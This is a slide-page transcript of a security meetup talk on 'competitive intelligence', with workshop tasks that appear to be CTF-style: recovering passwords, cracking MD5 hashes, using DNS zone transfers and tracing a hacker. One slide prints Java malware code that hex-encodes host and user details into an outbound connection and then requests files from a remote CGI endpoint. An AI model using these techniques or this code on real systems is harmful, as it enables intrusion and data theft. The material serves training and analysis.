Security Hole #11 - Competitive intelligence - Beliaiev
-
Upload
nazar-tymoshyk -
Category
Technology
-
view
683 -
download
0
description
Transcript of Security Hole #11 - Competitive intelligence - Beliaiev
![Page 1: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/1.jpg)
![Page 2: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/2.jpg)
Competitive Intelligence –
Competitor's Fatality
Igor Beliaiev
![Page 3: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/3.jpg)
What is Competitive Intelligence(CI)?
![Page 4: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/4.jpg)
![Page 5: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/5.jpg)
Basic methods
![Page 6: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/6.jpg)
![Page 7: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/7.jpg)
![Page 8: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/8.jpg)
Private data
![Page 9: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/9.jpg)
![Page 10: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/10.jpg)
![Page 11: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/11.jpg)
Start is here: goo.gl/ygm51k
Інфо ебаут хак
The Workshop
![Page 12: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/12.jpg)
Task #1. Intro
We know that Mikko Kuttonen is using github.
His github for working staff is mikkoKut1
You have to find his password for the home media server(107.170.*.*).
![Page 13: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/13.jpg)
Task #2. Pakistani
There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution.
We have some information about his last attacks, so we have to find out what he has done with his victims.
![Page 14: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/14.jpg)
We have some dump with journalist's accounts on times.com. (times.zip)
Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password.
Task #2. Pakistani
Hint! Journalist’s passwords are encrypted with MD5 algorithm
Hint! You can use MD5 online decoders
![Page 15: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/15.jpg)
Task #3. Archive
As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted.
We need to read the data from zikua.doc
Hint! Look carefully for the files in archives. Are there any common things?
Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
![Page 16: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/16.jpg)
Task #4. Zik.ua
From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua
We need to find the subdomain and torrent server.
Hint! DNS-requests might help you
Hint! You can try to use AXFR-requests
![Page 17: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/17.jpg)
$1mln/month
ValveSoftware.com
![Page 18: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/18.jpg)
![Page 19: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/19.jpg)
![Page 20: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/20.jpg)
Task #5. Find the hacker
Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password.
We started to download his private files, but suddenly connection was lost...forever.
We managed to download only one file.
Using this file, find the name of the hacker!
![Page 21: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/21.jpg)
Task #5. Find the hacker
![Page 23: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/23.jpg)
Tasks from PHDays
![Page 24: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/24.jpg)
Tasks from PHDays
![Page 25: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/25.jpg)
Tasks from PHDays
![Page 26: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/26.jpg)
Tasks from PHDaysString str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
![Page 27: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/27.jpg)
Tasks from PHDays
+ WebRTC (net.ipcalf.com)
![Page 28: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/28.jpg)
Tasks from PHDays
![Page 29: Security Hole #11 - Competitive intelligence - Beliaiev](https://reader034.fdocuments.in/reader034/viewer/2022051819/54c562fb4a79599f748b45a0/html5/thumbnails/29.jpg)
? ?